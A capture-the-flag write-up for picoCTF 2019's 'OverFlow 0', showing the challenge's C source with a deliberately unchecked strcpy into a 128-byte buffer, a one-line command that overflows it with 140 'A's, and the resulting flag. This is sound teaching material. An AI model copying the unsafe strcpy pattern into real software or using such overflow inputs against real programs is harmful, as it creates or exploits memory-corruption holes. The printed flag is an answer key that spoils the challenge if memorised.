picoCTF 2019 - OverFlow 0 writeup

Description

This should be easy. Overflow the correct buffer in this program and get a flag.

Category: Binary Exploitation

Points: 100

Source Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>

#define FLAGSIZE_MAX 64

char flag[FLAGSIZE_MAX];

void sigsegv_handler(int sig) {
  fprintf(stderr, "%s\n", flag);
  fflush(stderr);
  exit(1);
}

void vuln(char *input){
  char buf[128];
  strcpy(buf, input);
}

int main(int argc, char **argv){

  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
    exit(0);
  }
  fgets(flag,FLAGSIZE_MAX,f);
  signal(SIGSEGV, sigsegv_handler);

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  if (argc > 1) {
    vuln(argv[1]);
    printf("You entered: %s", argv[1]);
  }
  else
    printf("Please enter an argument next time\n");
  return 0;
}

Explanation

The flag.txt file is written to a buffer named flag. Next, a signal handler is set up to catch segmentation faults (SIGSEGV). If the signal handler is triggered, it will print the flag to stderr.

Plan

User input is taken from argv[1] and stored in a 128 byte buffer. Since no bounds checking is done, we can cause a segfault overflowing the buffer with more than 128 bytes.

Exploit

I used python to pass 140 A’s to the vuln program:

$ ./vuln $(python -c "print 'A' * 140")
picoCTF{3asY_P3a5yd2b59a57}